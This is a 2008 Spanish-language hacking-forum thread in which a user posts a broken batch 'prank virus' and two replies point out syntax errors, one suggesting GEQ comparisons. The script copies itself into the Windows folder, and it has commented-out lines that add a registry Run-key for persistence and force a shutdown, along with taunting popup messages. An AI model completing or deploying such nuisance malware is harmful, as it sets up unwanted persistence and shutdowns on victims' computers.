elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Bloques
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Bloques  (Leído 2,652 veces)
Herzius

Desconectado Desconectado

Mensajes: 9


Ver Perfil
Bloques
« en: 21 Enero 2008, 21:12 pm »

Hola, tengo un problemilla que seguramente será los bloques pero no se que hacer

Código:
echo off
rem Script made by Herzius
set /a numero=%random%
pause
if %numero% >>==90000 goto :1
if %numero% >>==9000 goto :2
if %numero% >>==900 goto :3

:1
division=%numero%/10000 goto :mensajes
:2
division2=%numero%/1000 goto :mensajes
:3
division3=%numero%/100 goto :mensajes

:mensajes
msg * Hola soy Herzius
msg * Te acabo de enganxar :D
msg * No te voy a dejar :D
copy cpvwa.bat %windir%
msg * Tranquilo no es un virus
rem Reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v cpvwa /d %windir%\cpvwa.bat
msg * es una bromilla que te ara perder tiempo :D
rm asd.bat
msg * Te entetendre %tiempo% minutos

msg * Que va no es broma lo del virus y lo del tiempo

msg * si que es un virus pero no te are perder tiempo

msg * Estas contento? No te are perder tiempo

msg * El ordenador se apagara en %tiempo% minutos

msg * Adios, recuerda %tiempo% %tiempo% %tiempo%

msg * Aprobecha tus %tiempo% minutos de tiempo :D

msg * Y el tiempo empieza...

msg * YA!!
rem shutdown -s -f -%tiempo%
echo VA A QUE ESPERAS PARA DISFRUTAR DE TUS
pause>nul

PD los comentarios y todo eso esta así por que lo estoy probando y no quiero que me fastidie :D


En línea

MK-Ultra


Desconectado Desconectado

Mensajes: 435


~ Nevermind ~


Ver Perfil WWW
Re: Bloques
« Respuesta #1 en: 22 Enero 2008, 14:48 pm »

Primero que en ningun lado definis la funcion tiempo.

Segundo que si estas tratando de poner aca:
Código:
if %numero% >>==90000 goto :1
if %numero% >>==9000 goto :2
if %numero% >>==900 goto :3
que si el numero es mayor o = q X lo tienes que poner asi:
Código:
if %numero% GEQ 90000 goto :1
if %numero% GEQ 9000 goto :2
if %numero% GEQ 900 goto :3

Espero que te sea de utilidad  ;)


En línea

Agradecer no cuesta nada (al menos no mucho)

BTC: 1DHKsWE6wGkUiHbKkwBDaF8DEGwn9n6nxQ
~[uNd3rc0d3]~

Desconectado Desconectado

Mensajes: 188


programando...


Ver Perfil
Re: Bloques
« Respuesta #2 en: 22 Enero 2008, 23:35 pm »

o.O

tenes muchos errores

para empezar no es nesesario /a

nose para que pones estp >> no te va a andar porque lo va a tomar como un redireccionamiento

despues en las etiquetas 1 2 3 escribis como si fuera un documento de texto....el ms-dos solo interpreta los comandos que esten en el system32

y despues en ves de hacer lo que queres hace le mandas comentarios

¬¬

eso no sirve

nos vemos
En línea


leete las reglas asi todos estamos mejor ;)
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
calculo de lineas de cache y bloques de ram [SOLUCIONADO]
Hardware
KandiZickZad 4 10,141 Último mensaje 27 Noviembre 2010, 01:02 am
por KandiZickZad
Máscaras y bloques de bits
Programación C/C++
loryisus 6 2,548 Último mensaje 7 Marzo 2014, 20:16 pm
por eferion
Bloques de memoria en C++ [Duda de Concepto] « 1 2 »
Programación C/C++
tmb90 11 6,290 Último mensaje 11 Septiembre 2014, 14:23 pm
por kaiserr
¿Qué es la Cadena de Bloques (Blockchain)?
Foro Libre
DISCIPULUS 9 5,743 Último mensaje 29 Mayo 2017, 20:52 pm
por Orubatosu
Envio mensaje por bloques en socket
Programación C/C++
jorgedl 1 1,250 Último mensaje 3 Octubre 2018, 17:52 pm
por OmarHack
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines